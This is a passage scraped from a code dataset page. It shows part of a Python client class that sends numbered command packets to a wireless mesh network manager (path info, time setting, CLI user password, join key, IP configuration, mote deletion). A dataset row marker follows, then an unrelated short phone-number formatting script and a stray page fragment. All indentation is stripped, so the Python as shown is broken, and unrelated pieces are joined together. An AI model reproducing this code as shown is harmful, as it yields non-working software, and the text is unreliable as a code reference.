payload = bytearray(macAddress) + bytearray([next])
return self.write_to_manager(packetType=0x2F, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getPathInfo(self, sourceMacAddress, destMacAddress, serviceTypeAck=True):
helpers.OUT("getPathInfo")
payload = bytearray(sourceMacAddress) + bytearray(destMacAddress)
return self.write_to_manager(packetType=0x30, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getNextPathInfo(self, macAddress, filter, pathId, serviceTypeAck=True):
helpers.OUT("getNextPathInfo")
payload = bytearray(macAddress) + bytearray(struct.pack(">BH", filter, pathId))
return self.write_to_manager(packetType=0x31, payload=payload, serviceTypeAck=serviceTypeAck)
def send_setAdvertising(self, activate, serviceTypeAck=True):
helpers.OUT("setAdvertising")
payload = bytearray([activate])
return self.write_to_manager(packetType=0x32, payload=payload, serviceTypeAck=serviceTypeAck)
def send_setDownstreamFrameMode(self, frameMode, serviceTypeAck=True):
helpers.OUT("setDownstreamFrameMode")
payload = bytearray([frameMode])
return self.write_to_manager(packetType=0x33, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getManagerStatistics(self, serviceTypeAck=True):
helpers.OUT("getManagerStatistics")
return self.write_to_manager(packetType=0x35, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_setTime(self, trigger, utcTime, serviceTypeAck=True):
helpers.OUT("setTime")
payload = bytearray([trigger]) + bytearray(utcTime)
return self.write_to_manager(packetType=0x36, payload=payload, serviceTypeAck=serviceTypeAck)
def send_setCLIUser(self, role, password, serviceTypeAck=True):
helpers.OUT("setCLIUser")
payload = bytearray([role]) + bytearray(password)
return self.write_to_manager(packetType=0x3A, payload=payload, serviceTypeAck=serviceTypeAck)
def send_sendIP(self, macAddress, priority, options, encryptedOffset, data, serviceTypeAck=True):
helpers.OUT("sendIP")
payload = bytearray(macAddress) + bytearray(struct.pack(">BBB", priority, options, encryptedOffset)) + bytearray(data)
return self.write_to_manager(packetType=0x3B, payload=payload, serviceTypeAck=serviceTypeAck)
def send_restoreFactoryDefaults(self, serviceTypeAck=True):
helpers.OUT("restoreFactoryDefaults")
return self.write_to_manager(packetType=0x3D, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_getMoteInfo(self, macAddress, serviceTypeAck=True):
helpers.OUT("getMoteInfo")
payload = bytearray(macAddress)
return self.write_to_manager(packetType=0x3E, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getNetworkConfig(self, serviceTypeAck=True):
helpers.OUT("getNetworkConfig")
return self.write_to_manager(packetType=0x3F, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_getNetworkInfo(self, serviceTypeAck=True):
helpers.OUT("getNetoworkInfo")
return self.write_to_manager(packetType=0x40, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_getMoteConfigById(self, moteId, serviceTypeAck=True):
helpers.OUT("getMoteConfigById")
payload = bytearray(struct.pack(">H", moteId))
return self.write_to_manager(packetType=0x41, payload=payload, serviceTypeAck=serviceTypeAck)
def send_setCommonJoinKey(self, key, serviceTypeAck=False):
helpers.OUT("setCommonJoinKey")
payload = bytearray(key)
return self.write_to_manager(packetType=0x42, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getIPConfig(self, serviceTypeAck=True):
helpers.OUT("getIPConfig")
return self.write_to_manager(packetType=0x43, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_setIPConfig(self, ipv6Address, mask, serviceTypeAck=True):
helpers.OUT("setIPConfig")
payload = bytearray(ipv6Address) + bytearray(mask)
return self.write_to_manager(packetType=0x44, payload=payload, serviceTypeAck=serviceTypeAck)
def send_deleteMote(self, macAddress, serviceTypeAck=True):
helpers.OUT("deleteMote")
payload = bytearray(macAddress)
return self.write_to_manager(packetType=0x45, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getMoteLinks(self, macAddress, idx, serviceTypeAck=True):
helpers.OUT("getMoteLinks")
payload = bytearray(macAddress) + bytearray(struct.pack(">H", idx))
return self.write_to_manager(packetType=0x46, payload=payload, serviceTypeAck=serviceTypeAck)
|
992,199 | 70839af7463a5fdb732e656b087202301495a2f5 |
phone = input("Please enter a 10 digit number: ")
print(phone[0:3] + '-' + phone[3:6] + '-' + phone[6:])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.